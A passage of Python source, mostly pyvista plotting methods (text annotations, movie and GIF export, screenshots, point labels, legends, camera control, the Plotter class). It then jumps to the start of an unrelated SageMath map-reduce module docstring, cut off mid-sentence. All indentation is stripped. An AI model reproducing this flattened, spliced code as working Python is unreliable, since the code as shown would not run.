'upper_right' : vtk.vtkCornerAnnotation.UpperRight,
'lower_edge' : vtk.vtkCornerAnnotation.LowerEdge,
'upper_edge' : vtk.vtkCornerAnnotation.UpperEdge,
'left_edge' : vtk.vtkCornerAnnotation.LeftEdge,
'right_edge' : vtk.vtkCornerAnnotation.RightEdge,
}
corner_mappings['ll'] = corner_mappings['lower_left']
corner_mappings['lr'] = corner_mappings['lower_right']
corner_mappings['ul'] = corner_mappings['upper_left']
corner_mappings['ur'] = corner_mappings['upper_right']
corner_mappings['top'] = corner_mappings['upper_edge']
corner_mappings['bottom'] = corner_mappings['lower_edge']
corner_mappings['right'] = corner_mappings['right_edge']
corner_mappings['r'] = corner_mappings['right_edge']
corner_mappings['left'] = corner_mappings['left_edge']
corner_mappings['l'] = corner_mappings['left_edge']
if isinstance(position, (int, str, bool)):
if isinstance(position, str):
position = corner_mappings[position]
elif position is True:
position = corner_mappings['upper_left']
self.textActor = vtk.vtkCornerAnnotation()
# This is how you set the font size with this actor
self.textActor.SetLinearFontScaleFactor(font_size // 2)
self.textActor.SetText(position, text)
else:
self.textActor = vtk.vtkTextActor()
self.textActor.SetInput(text)
self.textActor.SetPosition(position)
self.textActor.GetTextProperty().SetFontSize(int(font_size * 2))
self.textActor.GetTextProperty().SetColor(parse_color(color))
self.textActor.GetTextProperty().SetFontFamily(FONT_KEYS[font])
self.textActor.GetTextProperty().SetShadow(shadow)
self.add_actor(self.textActor, reset_camera=False, name=name, loc=loc, pickable=False)
return self.textActor
def open_movie(self, filename, framerate=24):
"""
Establishes a connection to the ffmpeg writer
Parameters
----------
filename : str
Filename of the movie to open. Filename should end in mp4,
but other filetypes may be supported. See ``imageio.get_writer``.
framerate : int, optional
Frames per second.
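Examples
--------
A sketch, where ``'movie.mp4'`` is only an illustrative filename:
>>> plotter.open_movie('movie.mp4') # doctest:+SKIP
>>> plotter.write_frame() # doctest:+SKIP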
"""
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
self.mwriter = imageio.get_writer(filename, fps=framerate)
def open_gif(self, filename):
"""
Open a gif file.
Parameters
----------
filename : str
Filename of the gif to open. Filename must end in gif.
"""
if filename[-3:] != 'gif':
raise Exception('Unsupported filetype. Must end in .gif')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
self._gif_filename = os.path.abspath(filename)
self.mwriter = imageio.get_writer(filename, mode='I')
def write_frame(self):
""" Writes a single frame to the movie file """
if not hasattr(self, 'mwriter'):
raise AssertionError('This plotter has not opened a movie or GIF file.')
self.mwriter.append_data(self.image)
@property
def window_size(self):
""" returns render window size """
return list(self.ren_win.GetSize())
@window_size.setter
def window_size(self, window_size):
""" set the render window size """
self.ren_win.SetSize(window_size[0], window_size[1])
def _run_image_filter(self, ifilter):
# Update filter and grab pixels
ifilter.Modified()
ifilter.Update()
image = pyvista.wrap(ifilter.GetOutput())
img_size = image.dimensions
img_array = pyvista.utilities.point_scalar(image, 'ImageScalars')
# Reshape and write
tgt_size = (img_size[1], img_size[0], -1)
return img_array.reshape(tgt_size)[::-1]
@property
def image_depth(self):
""" Returns an image array of current render window """
ifilter = vtk.vtkWindowToImageFilter()
ifilter.SetInput(self.ren_win)
ifilter.ReadFrontBufferOff()
ifilter.SetInputBufferTypeToZBuffer()
return self._run_image_filter(ifilter)
@property
def image(self):
""" Returns an image array of current render window """
if not hasattr(self, 'ren_win') and hasattr(self, 'last_image'):
return self.last_image
ifilter = vtk.vtkWindowToImageFilter()
ifilter.SetInput(self.ren_win)
ifilter.ReadFrontBufferOff()
if self.image_transparent_background:
ifilter.SetInputBufferTypeToRGBA()
else:
ifilter.SetInputBufferTypeToRGB()
return self._run_image_filter(ifilter)
def enable_eye_dome_lighting(self):
"""Enable eye dome lighting (EDL) for active renderer"""
return self.renderer.enable_eye_dome_lighting()
def disable_eye_dome_lighting(self):
"""Disable eye dome lighting (EDL) for active renderer"""
return self.renderer.disable_eye_dome_lighting()
def add_lines(self, lines, color=(1, 1, 1), width=5, label=None, name=None):
"""
Adds lines to the plotting object.
Parameters
----------
lines : np.ndarray or pyvista.PolyData
Points representing line segments. For example, two line segments
would be represented as:
np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
width : float, optional
Thickness of lines
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Returns
-------
actor : vtk.vtkActor
Lines actor.
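Examples
--------
A sketch drawing one segment from the origin to (1, 0, 0):
>>> import numpy as np
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_lines(np.array([[0.0, 0.0, 0.0], [1.0, 0.0, 0.0]]))
>>> plotter.show() # doctest:+SKIP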
"""
if not isinstance(lines, np.ndarray):
raise Exception('Input should be an array of point segments')
lines = pyvista.lines_from_points(lines)
# Create mapper and add lines
mapper = vtk.vtkDataSetMapper()
mapper.SetInputData(lines)
rgb_color = parse_color(color)
# legend label
if label:
if not isinstance(label, str):
raise AssertionError('Label must be a string')
self._labels.append([lines, label, rgb_color])
# Create actor (stored locally; this is a line actor, not the scalar bar)
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetLineWidth(width)
actor.GetProperty().EdgeVisibilityOn()
actor.GetProperty().SetEdgeColor(rgb_color)
actor.GetProperty().SetColor(rgb_color)
actor.GetProperty().LightingOff()
# Add to renderer
self.add_actor(actor, reset_camera=False, name=name, pickable=False)
return actor
def remove_scalar_bar(self):
""" Removes scalar bar """
if hasattr(self, 'scalar_bar'):
self.remove_actor(self.scalar_bar, reset_camera=False)
def add_point_labels(self, points, labels, italic=False, bold=True,
font_size=None, text_color=None,
font_family=None, shadow=False,
show_points=True, point_color=None, point_size=5,
name=None, shape_color='grey', shape='rounded_rect',
fill_shape=True, margin=3, shape_opacity=1.0,
pickable=True, **kwargs):
"""
Creates a point actor with one label from list labels assigned to
each point.
Parameters
----------
points : np.ndarray or pyvista.Common
n x 3 numpy array of points or pyvista dataset with points
labels : list or str
List of labels. Must be the same length as points. If a string name
is given with a pyvista.Common input for points, then these are fetched.
italic : bool, optional
Italicises title and bar labels. Default False.
bold : bool, optional
Bolds title and bar labels. Default True
font_size : float, optional
Sets the size of the title font. Defaults to 16.
text_color : string or 3 item list, optional
Color of text. Either a string, rgb list, or hex color string.
text_color='white'
text_color='w'
text_color=[1, 1, 1]
text_color='#FFFFFF'
font_family : string, optional
Font family. Must be either courier, times, or arial.
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
show_points : bool, optional
Controls if points are visible. Default True
point_color : string or 3 item list, optional. Color of points (if visible).
Either a string, rgb list, or hex color string. For example:
point_color='white'
point_color='w'
point_color=[1, 1, 1]
point_color='#FFFFFF'
point_size : float, optional
Size of points (if visible)
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
shape_color : string or 3 item list, optional
Color of the label background shape. Either a string, rgb list, or
hex color string.
shape : str, optional
The string name of the shape to use. Options are ``'rect'`` or
``'rounded_rect'``. If you want no shape, pass ``None``
fill_shape : bool, optional
Fill the shape with the ``shape_color``. Outlines if ``False``.
margin : int, optional
The size of the margin on the label background shape. Default is 3.
shape_opacity : float
The opacity of the shape between zero and one.
Returns
-------
labelMapper : vtk.vtkLabelPlacementMapper
VTK label mapper. Can be used to change properties of the labels.
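Examples
--------
A sketch labeling three points:
>>> import numpy as np
>>> import pyvista
>>> points = np.array([[0.0, 0.0, 0.0], [1.0, 1.0, 0.0], [2.0, 0.0, 0.0]])
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_point_labels(points, ['a', 'b', 'c'], font_size=24)
>>> plotter.show() # doctest:+SKIP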
"""
if font_family is None:
font_family = rcParams['font']['family']
if font_size is None:
font_size = rcParams['font']['size']
if point_color is None and text_color is None and kwargs.get('color', None) is not None:
point_color = kwargs.get('color', None)
text_color = kwargs.get('color', None)
if point_color is None:
point_color = rcParams['color']
if text_color is None:
text_color = rcParams['font']['color']
if isinstance(points, (list, tuple)):
points = np.array(points)
if isinstance(points, np.ndarray):
vtkpoints = pyvista.PolyData(points) # Cast to poly data
elif is_pyvista_dataset(points):
vtkpoints = pyvista.PolyData(points.points)
if isinstance(labels, str):
labels = points.point_arrays[labels].astype(str)
else:
raise TypeError('Points type not useable: {}'.format(type(points)))
if len(vtkpoints.points) != len(labels):
raise Exception('There must be one label for each point')
vtklabels = vtk.vtkStringArray()
vtklabels.SetName('labels')
for item in labels:
vtklabels.InsertNextValue(str(item))
vtkpoints.GetPointData().AddArray(vtklabels)
# Create hierarchy
hier = vtk.vtkPointSetToLabelHierarchy()
hier.SetInputData(vtkpoints)
# hier.SetOrientationArrayName('orientation')
hier.SetLabelArrayName('labels')
# create label mapper
labelMapper = vtk.vtkLabelPlacementMapper()
labelMapper.SetInputConnection(hier.GetOutputPort())
if not isinstance(shape, str):
labelMapper.SetShapeToNone()
elif shape.lower() == 'rect':
labelMapper.SetShapeToRect()
elif shape.lower() == 'rounded_rect':
labelMapper.SetShapeToRoundedRect()
else:
raise RuntimeError('Shape ({}) not understood'.format(shape))
if fill_shape:
labelMapper.SetStyleToFilled()
else:
labelMapper.SetStyleToOutline()
labelMapper.SetBackgroundColor(parse_color(shape_color))
labelMapper.SetBackgroundOpacity(shape_opacity)
labelMapper.SetMargin(margin)
textprop = hier.GetTextProperty()
textprop.SetItalic(italic)
textprop.SetBold(bold)
textprop.SetFontSize(font_size)
textprop.SetFontFamily(parse_font_family(font_family))
textprop.SetColor(parse_color(text_color))
textprop.SetShadow(shadow)
self.remove_actor('{}-points'.format(name), reset_camera=False)
self.remove_actor('{}-labels'.format(name), reset_camera=False)
# add points
if show_points:
style = 'points'
else:
style = 'surface'
self.add_mesh(vtkpoints, style=style, color=point_color,
point_size=point_size, name='{}-points'.format(name),
pickable=pickable)
labelActor = vtk.vtkActor2D()
labelActor.SetMapper(labelMapper)
self.add_actor(labelActor, reset_camera=False,
name='{}-labels'.format(name), pickable=False)
return labelMapper
def add_point_scalar_labels(self, points, labels, fmt=None, preamble='', **kwargs):
"""Wrapper for :func:`pyvista.BasePlotter.add_point_labels` that will label
points from a dataset with their scalar values.
Parameters
----------
points : np.ndarray or pyvista.Common
n x 3 numpy array of points or pyvista dataset with points
labels : str
String name of the point data array to use.
fmt : str
String formatter used to format numerical data
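Examples
--------
A sketch, assuming ``mesh`` is a pyvista dataset carrying a point
array named ``'values'``:
>>> _ = plotter.add_point_scalar_labels(mesh, 'values', fmt='%.2f') # doctest:+SKIP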
"""
if not is_pyvista_dataset(points):
raise TypeError('input points must be a pyvista dataset, not: {}'.format(type(points)))
if not isinstance(labels, str):
raise TypeError('labels must be a string name of the scalar array to use')
if fmt is None:
fmt = rcParams['font']['fmt']
if fmt is None:
fmt = '%.6e'
scalars = points.point_arrays[labels]
phrase = '{} {}'.format(preamble, fmt)
labels = [phrase % val for val in scalars]
return self.add_point_labels(points, labels, **kwargs)
def add_points(self, points, **kwargs):
""" Add points to a mesh """
kwargs['style'] = 'points'
return self.add_mesh(points, **kwargs)
def add_arrows(self, cent, direction, mag=1, **kwargs):
""" Adds arrows to plotting object """
direction = direction.copy()
if cent.ndim != 2:
cent = cent.reshape((-1, 3))
if direction.ndim != 2:
direction = direction.reshape((-1, 3))
direction[:,0] *= mag
direction[:,1] *= mag
direction[:,2] *= mag
pdata = pyvista.vector_poly_data(cent, direction)
# Create arrow object
arrow = vtk.vtkArrowSource()
arrow.Update()
glyph3D = vtk.vtkGlyph3D()
glyph3D.SetSourceData(arrow.GetOutput())
glyph3D.SetInputData(pdata)
glyph3D.SetVectorModeToUseVector()
glyph3D.Update()
arrows = wrap(glyph3D.GetOutput())
return self.add_mesh(arrows, **kwargs)
@staticmethod
def _save_image(image, filename, return_img=None):
"""Internal helper for saving a NumPy image array"""
if not image.size:
raise Exception('Empty image. Have you run plot() first?')
# write screenshot to file
if isinstance(filename, str):
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
if not return_img:
return imageio.imwrite(filename, image)
imageio.imwrite(filename, image)
return image
def screenshot(self, filename=None, transparent_background=None,
return_img=None, window_size=None):
"""
Takes screenshot at current camera position
Parameters
----------
filename : str, optional
Location to write image to. If None, no image is written.
transparent_background : bool, optional
Makes the background transparent. Default False.
return_img : bool, optional
If a string filename is given and this is true, a NumPy array of
the image will be returned.
Returns
-------
img : numpy.ndarray
Array containing pixel RGB and alpha. Sized:
[Window height x Window width x 3] for transparent_background=False
[Window height x Window width x 4] for transparent_background=True
Examples
--------
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_mesh(sphere)
>>> plotter.screenshot('screenshot.png') # doctest:+SKIP
"""
if window_size is not None:
self.window_size = window_size
# configure image filter
if transparent_background is None:
transparent_background = rcParams['transparent_background']
self.image_transparent_background = transparent_background
# This if statement allows you to save screenshots of closed plotters
# This is needed for the sphinx-gallery work
if not hasattr(self, 'ren_win'):
# If plotter has been closed...
# check if last_image exists
if hasattr(self, 'last_image'):
# Save last image
return self._save_image(self.last_image, filename, return_img)
# Plotter hasn't been rendered or was improperly closed
raise AttributeError('This plotter is unable to save a screenshot.')
if isinstance(self, Plotter):
# TODO: we need a consistent rendering function
self.render()
else:
self._render()
# NOTE: this needs to be called twice for some reason
img = self.image
img = self.image
return self._save_image(img, filename, return_img)
def add_legend(self, labels=None, bcolor=(0.5, 0.5, 0.5), border=False,
size=None, name=None):
"""
Adds a legend to the render window. Entries must be a list
containing one string and color entry for each item.
Parameters
----------
labels : list, optional
When set to None, uses existing labels as specified by
- add_mesh
- add_lines
- add_points
List containing one entry for each item to be added to the
legend. Each entry must contain two strings, [label,
color], where label is the name of the item to add, and
color is the color of the label to add.
bcolor : list or string, optional
Background color, either a three item 0 to 1 RGB color
list, or a matplotlib color string (e.g. 'w' or 'white'
for a white color). If None, legend background is
disabled.
border : bool, optional
Controls if there will be a border around the legend.
Default False.
size : list, optional
Two float list, each float between 0 and 1. For example
[0.1, 0.1] would make the legend 10% the size of the
entire figure window.
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
Returns
-------
legend : vtk.vtkLegendBoxActor
Actor for the legend.
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> othermesh = examples.load_uniform()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, label='My Mesh')
>>> _ = plotter.add_mesh(othermesh, 'k', label='My Other Mesh')
>>> _ = plotter.add_legend()
>>> plotter.show() # doctest:+SKIP
Alternative manual example
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> othermesh = examples.load_uniform()
>>> legend_entries = []
>>> legend_entries.append(['My Mesh', 'w'])
>>> legend_entries.append(['My Other Mesh', 'k'])
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh)
>>> _ = plotter.add_mesh(othermesh, 'k')
>>> _ = plotter.add_legend(legend_entries)
>>> plotter.show() # doctest:+SKIP
"""
self.legend = vtk.vtkLegendBoxActor()
if labels is None:
# use existing labels
if not self._labels:
raise Exception('No labels input.\n\n' +
'Add labels to individual items when adding them to ' +
'the plotting object with the "label=" parameter, ' +
'or enter them as the "labels" parameter.')
self.legend.SetNumberOfEntries(len(self._labels))
for i, (vtk_object, text, color) in enumerate(self._labels):
self.legend.SetEntry(i, vtk_object, text, parse_color(color))
else:
self.legend.SetNumberOfEntries(len(labels))
legendface = pyvista.single_triangle()
for i, (text, color) in enumerate(labels):
self.legend.SetEntry(i, legendface, text, parse_color(color))
if size:
self.legend.SetPosition2(size[0], size[1])
if bcolor is None:
self.legend.UseBackgroundOff()
else:
self.legend.UseBackgroundOn()
self.legend.SetBackgroundColor(bcolor)
if border:
self.legend.BorderOn()
else:
self.legend.BorderOff()
# Add to renderer
self.add_actor(self.legend, reset_camera=False, name=name, pickable=False)
return self.legend
@property
def camera_position(self):
""" Returns camera position of the active render window """
return self.renderers[self._active_renderer_index].camera_position
@camera_position.setter
def camera_position(self, camera_location):
""" Set camera position of the active render window """
self.renderers[self._active_renderer_index].camera_position = camera_location
def reset_camera(self):
"""
Reset camera so it slides along the vector defined from camera
position to focal point until all of the actors can be seen.
"""
self.renderers[self._active_renderer_index].reset_camera()
self._render()
def isometric_view(self):
"""DEPRECATED: Please use ``view_isometric``"""
return self.view_isometric()
def view_isometric(self):
"""
Resets the camera to a default isometric view showing all the
actors in the scene.
"""
return self.renderer.view_isometric()
def view_vector(self, vector, viewup=None):
"""View the scene along the given vector"""
return self.renderer.view_vector(vector, viewup=viewup)
def view_xy(self, negative=False):
"""View the XY plane"""
return self.renderer.view_xy(negative=negative)
def view_xz(self, negative=False):
"""View the XZ plane"""
return self.renderer.view_xz(negative=negative)
def view_yz(self, negative=False):
"""View the YZ plane"""
return self.renderer.view_yz(negative=negative)
def disable(self):
"""Disable this renderer's camera from being interactive"""
return self.renderer.disable()
def enable(self):
"""Enable this renderer's camera to be interactive"""
return self.renderer.enable()
def set_background(self, color, loc='all'):
"""
Sets background color
Parameters
----------
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
loc : int, tuple, list, or str, optional
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If ``loc='all'`` then all
render windows will have their background set.
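Examples
--------
A minimal sketch setting a solid black background:
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> plotter.set_background('black')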
"""
if color is None:
color = rcParams['background']
if isinstance(color, str):
if color.lower() in ('paraview', 'pv'):
# Use the default ParaView background color
color = PV_BACKGROUND
else:
color = pyvista.string_to_rgb(color)
if loc == 'all':
for renderer in self.renderers:
renderer.SetBackground(color)
else:
renderer = self.renderers[self.loc_to_index(loc)]
renderer.SetBackground(color)
@property
def background_color(self):
""" Returns background color of the first render window """
return self.renderers[0].GetBackground()
@background_color.setter
def background_color(self, color):
""" Sets the background color of all the render windows """
self.set_background(color)
def remove_legend(self):
""" Removes legend actor """
if hasattr(self, 'legend'):
self.remove_actor(self.legend, reset_camera=False)
self._render()
def generate_orbital_path(self, factor=3., n_points=20, viewup=None, shift=0.0):
"""Genrates an orbital path around the data scene
Parameters
----------
factor : float
A scaling factor when building the orbital extent
n_points : int
number of points on the orbital path
viewup : list(float)
the normal to the orbital plane
shift : float, optional
shift the plane up/down from the center of the scene by this amount
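Examples
--------
A minimal sketch generating a path around a sphere (see ``orbit_on_path``):
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(pyvista.Sphere())
>>> path = plotter.generate_orbital_path(n_points=36)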
"""
if viewup is None:
viewup = rcParams['camera']['viewup']
center = np.array(self.center)
bnds = np.array(self.bounds)
radius = (bnds[1] - bnds[0]) * factor
y = (bnds[3] - bnds[2]) * factor
if y > radius:
radius = y
center += np.array(viewup) * shift
return pyvista.Polygon(center=center, radius=radius, normal=viewup, n_sides=n_points)
def fly_to(self, point):
"""Given a position point, move the current camera's focal point to that
point. The movement is animated over the number of frames specified in
NumberOfFlyFrames. The LOD desired frame rate is used.
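Examples
--------
A minimal sketch; requires an interactive render window:
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(pyvista.Sphere())
>>> plotter.fly_to([0.5, 0.5, 0.5])  # doctest:+SKIP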
"""
if not hasattr(self, 'iren'):
raise AttributeError('This plotter does not have an interactive window')
return self.iren.FlyTo(self.renderer, *point)
def orbit_on_path(self, path=None, focus=None, step=0.5, viewup=None,
bkg=True, write_frames=False):
"""Orbit on the given path focusing on the focus point
Parameters
----------
path : pyvista.PolyData
Path of orbital points. The order of the points is the order of
travel
focus : list(float) of length 3, optional
The point on which to focus the camera.
step : float, optional
The timestep between flying to each camera position
viewup : list(float)
the normal to the orbital plane
bkg : bool, optional
Run the orbit in a background thread. Only has an effect when this
plotter is a ``pyvista.BackgroundPlotter``.
write_frames : bool
Assume a file is open and write a frame on each camera view during
the orbit.
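Examples
--------
A minimal sketch orbiting a sphere along a generated path:
>>> import pyvista
>>> plotter = pyvista.Plotter(off_screen=True)
>>> _ = plotter.add_mesh(pyvista.Sphere())
>>> path = plotter.generate_orbital_path(n_points=36)
>>> plotter.orbit_on_path(path, step=0.01)  # doctest:+SKIP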
"""
if focus is None:
focus = self.center
if viewup is None:
viewup = rcParams['camera']['viewup']
if path is None:
path = self.generate_orbital_path(viewup=viewup)
if not is_pyvista_dataset(path):
path = pyvista.PolyData(path)
points = path.points
# Make sure the whole scene is visible
self.camera.SetThickness(path.length)
def orbit():
"""Internal thread for running the orbit"""
for point in points:
self.set_position(point)
self.set_focus(focus)
self.set_viewup(viewup)
if bkg:
time.sleep(step)
if write_frames:
self.write_frame()
if bkg and isinstance(self, pyvista.BackgroundPlotter):
thread = Thread(target=orbit)
thread.start()
else:
bkg = False
orbit()
return
def export_vtkjs(self, filename, compress_arrays=False):
"""
Export the current rendering scene as a VTKjs scene for
rendering in a web browser
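Examples
--------
A minimal sketch; the ``'my_scene'`` filename is illustrative. Export
must happen before the scene is shown or closed:
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(pyvista.Sphere())
>>> plotter.export_vtkjs('my_scene')  # doctest:+SKIP
>>> plotter.show()  # doctest:+SKIP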
"""
if not hasattr(self, 'ren_win'):
raise RuntimeError('Export must be called before showing/closing the scene.')
if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename):
filename = os.path.join(pyvista.FIGURE_PATH, filename)
return export_plotter_vtkjs(self, filename, compress_arrays=compress_arrays)
def __del__(self):
self.close()
self.deep_clean()
del self.renderers
class Plotter(BasePlotter):
""" Plotting object to display vtk meshes or numpy arrays.
Example
-------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> another_mesh = examples.load_uniform()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, color='red')
>>> _ = plotter.add_mesh(another_mesh, color='blue')
>>> plotter.show() # doctest:+SKIP
Parameters
----------
off_screen : bool, optional
Renders off screen when True. Useful for automated screenshots.
notebook : bool, optional
When True, the resulting plot is placed inline in a jupyter notebook.
Assumes a jupyter console is active. Automatically enables off_screen.
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one render
window.
border : bool, optional
Draw a border around each render window. Default False.
border_color : string or 3 item list, optional, defaults to 'k' (black)
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
window_size : list, optional
Window size in pixels. Defaults to [1024, 768]
multi_samples : int
The number of multi-samples used to mitigate aliasing. 4 is a good
default but 8 will have better results with a potential impact on
performance.
line_smoothing : bool
If True, enable line smoothing
point_smoothing : bool
If True, enable point smoothing
polygon_smoothing : bool
If True, enable polygon smoothing
"""
last_update_time = 0.0
q_pressed = False
right_timer_id = -1
def __init__(self, off_screen=None, notebook=None, shape=(1, 1),
border=None, border_color='k', border_width=2.0,
window_size=None, multi_samples=None, line_smoothing=False,
point_smoothing=False, polygon_smoothing=False):
"""
Initialize a vtk plotting object
"""
super(Plotter, self).__init__(shape=shape, border=border,
border_color=border_color,
border_width=border_width)
log.debug('Initializing')
def on_timer(iren, event_id):
""" Exit application if interactive renderer stops """
if event_id == 'TimerEvent':
self.iren.TerminateApp()
if off_screen is None:
off_screen = pyvista.OFF_SCREEN
if notebook is None:
notebook = scooby.in_ipykernel()
self.notebook = notebook
if self.notebook:
off_screen = True
self.off_screen = off_screen
if window_size is None:
window_size = rcParams['window_size']
if multi_samples is None:
multi_samples = rcParams['multi_samples']
# initialize render window
self.ren_win = vtk.vtkRenderWindow()
self.ren_win.SetMultiSamples(multi_samples)
self.ren_win.SetBorders(True)
if line_smoothing:
self.ren_win.LineSmoothingOn()
if point_smoothing:
self.ren_win.PointSmoothingOn()
if polygon_smoothing:
self.ren_win.PolygonSmoothingOn()
for renderer in self.renderers:
self.ren_win.AddRenderer(renderer)
if self.off_screen:
self.ren_win.SetOffScreenRendering(1)
else: # Allow user to interact
self.iren = vtk.vtkRenderWindowInteractor()
self.iren.LightFollowCameraOff()
self.iren.SetDesiredUpdateRate(30.0)
self.iren.SetRenderWindow(self.ren_win)
self.enable_trackball_style()
self.iren.AddObserver("KeyPressEvent", self.key_press_event)
self.update_style()
# for renderer in self.renderers:
# self.iren.SetRenderWindow(renderer)
# Set background
self.set_background(rcParams['background'])
# Set window size
self.window_size = window_size
# add timer event if interactive render exists
if hasattr(self, 'iren'):
self.iren.AddObserver(vtk.vtkCommand.TimerEvent, on_timer)
def show(self, title=None, window_size=None, interactive=True,
auto_close=None, interactive_update=False, full_screen=False,
screenshot=False, return_img=False, use_panel=None, cpos=None,
height=400):
"""
Creates plotting window
Parameters
----------
title : string, optional
Title of plotting window.
window_size : list, optional
Window size in pixels. Defaults to [1024, 768]
interactive : bool, optional
Enabled by default. Allows user to pan and move figure.
auto_close : bool, optional
Enabled by default. Exits the plotting session when the user
closes the window, provided interactive is True.
interactive_update: bool, optional
Disabled by default. Allows the user to draw without blocking;
the user should call ``Update()`` in each iteration.
full_screen : bool, optional
Opens window in full screen. When enabled, ignores
window_size. Default False.
use_panel : bool, optional
If False, the interactive rendering from panel will not be used in
notebooks
cpos : list(tuple(floats))
The camera position to use
height : int, optional
height for panel pane. Only used with panel.
Returns
-------
cpos : list
List of camera position, focal point, and view up
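Examples
--------
A minimal sketch:
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(pyvista.Sphere())
>>> cpos = plotter.show()  # doctest:+SKIP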
"""
if use_panel is None:
use_panel = rcParams['use_panel']
if auto_close is None:
auto_close = rcParams['auto_close']
# reset camera on the first render unless the camera is already set
if self._first_time: # and not self.camera_set:
for renderer in self.renderers:
if not renderer.camera_set and cpos is None:
renderer.camera_position = renderer.get_default_cam_pos()
renderer.ResetCamera()
elif cpos is not None:
renderer.camera_position = cpos
self._first_time = False
if full_screen:
self.ren_win.SetFullScreen(True)
self.ren_win.BordersOn() # super buggy when disabled
else:
if window_size is None:
window_size = self.window_size
self.ren_win.SetSize(window_size[0], window_size[1])
# Render
log.debug('Rendering')
self.ren_win.Render()
# This has to be after the first render for some reason
if title is None:
title = self.title
if title:
self.ren_win.SetWindowName(title)
self.title = title
# Keep track of image for sphinx-gallery
self.last_image = self.screenshot(screenshot, return_img=True)
disp = None
if interactive and (not self.off_screen):
try: # interrupts will be caught here
log.debug('Starting iren')
self.update_style()
self.iren.Initialize()
if not interactive_update:
self.iren.Start()
except KeyboardInterrupt:
log.debug('KeyboardInterrupt')
self.close()
raise KeyboardInterrupt
elif self.notebook and use_panel and not hasattr(self, 'volume'):
try:
from panel.pane import VTK as panel_display
disp = panel_display(self.ren_win, sizing_mode='stretch_width',
height=height)
except:
pass
# NOTE: after this point, nothing from the render window can be accessed
# as if a user pressed the close button, then it destroys the
# render view and a stream of errors will kill the Python
# kernel if code here tries to access that renderer.
# See issues #135 and #186 for insight before editing the
# remainder of this function.
# Get camera position before closing
cpos = self.camera_position
# NOTE: our conversion to panel currently does not support multi-view
# so we should display the static screenshot in notebooks for
# multi-view plots until we implement this feature
# If notebook is true and panel display failed:
if self.notebook and (disp is None or self.shape != (1,1)):
import PIL.Image
# sanity check
try:
import IPython
except ImportError:
raise Exception('Install IPython to display image in a notebook')
disp = IPython.display.display(PIL.Image.fromarray(self.last_image))
# Cleanup
if auto_close:
self.close()
# Return the notebook display: either panel object or image display
if self.notebook:
return disp
# If user asked for screenshot, return as numpy array after camera
# position
if return_img or screenshot is True:
return cpos, self.last_image
# default to returning last used camera position
return cpos
def plot(self, *args, **kwargs):
""" Present for backwards compatibility. Use `show()` instead """
logging.warning("`.plot()` is deprecated. Please use `.show()` instead.")
return self.show(*args, **kwargs)
def render(self):
""" renders main window """
self.ren_win.Render()
map_reduce.py
r"""
Parallel computations using RecursivelyEnumeratedSet and Map-Reduce
There exists an efficient way to distribute computations when you have a set
`S` of objects defined by :func:`RecursivelyEnumeratedSet` (see
:mod:`sage.sets.recursively_enumerated_set` for more details) over which you
would like to perform the following kinds of operations:
* Compute the cardinality of a (very large) set defined recursively (through a
call to
:class:`RecursivelyEnumeratedSet of forest type<sage.combinat.backtrack.SearchForest>`)
* More generally, compute any kind of generating series over this set
* Test a conjecture: i.e., find an element of `S` satisfying a specific
property; conversely, check that all of them do
* Count/list the elements of `S` having a specific property
* Apply any map/reduce kind of operation over the elements of `S`
AUTHORS:
- Florent Hivert -- code, documentation (2012-2016)
- Jean Baptiste Priez -- prototype, debugging help on MacOSX (2011-June, 2016)
- Nathann Cohen -- Some doc (2012)
Contents
--------
- :ref:`basic-usage`
- :ref:`advanced-use`
- :ref:`profiling`
- :ref:`logging`
- :ref:`protocol-description`
- :ref:`examples`
How is this different from usual MapReduce?
--------------------------------------------
This implementation is specific to
:class:`RecursivelyEnumeratedSet of forest type<sage.combinat.backtrack.SearchForest>`,
and uses its properties to do its job. Not only are the mapping
and reducing done on different processors, but so is **generating the
elements of** `S`.
.. _basic-usage:
How can I use all that stuff?
-----------------------------
First, you need the information necessary to describe a
:class:`RecursivelyEnumeratedSet of forest
type<sage.combinat.backtrack.SearchForest>` representing your set `S` (see
